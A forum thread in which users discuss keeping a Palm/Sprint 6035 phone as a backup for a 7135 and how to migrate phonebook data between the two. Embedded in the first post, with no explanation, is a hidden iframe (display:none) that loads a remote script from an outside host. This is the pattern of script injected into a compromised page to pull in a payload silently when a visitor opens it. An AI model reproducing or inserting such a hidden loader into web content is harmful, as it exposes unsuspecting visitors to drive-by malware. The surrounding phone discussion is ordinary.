+ Reply to Thread

7135 and 6035... How many

of you have the 7135 and have a 6035 as a backup in case the 7135 s**ts the bed.

I'm thinking of also picking up a 6035 in case something phunky happens to my 7135 when I get it.

I usually have a backup phone I can transer typical phonebook databases over to but with the Palm (I have over 1,000 #'s to backup) I assume it's just a quick sync on the 6035 until I would get the 7135 back?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Funny you should ask. I kept my Sprint 6035 activated for about a month and a half after I got my 7135. Basically as catastrophe insurance, as I had no experience with Verizon and was afraid I'd end up with some weird expensive-phone-but-no-service situation. Once Verizon officially announced I cancelled the Sprint account. I haven't had any trouble with my 7135 that would make me feel like I need a backup phone.

As for switching between the two, you would basically have to do the whole migrating from one device to another process. I don't think there's any shortcuts between the 6035; I just backed up all my data, moved my PalmBackup folder, deleted the rest, and started over with the 7135 disk.
    ---------------
    The same thing we do every night, Pinky...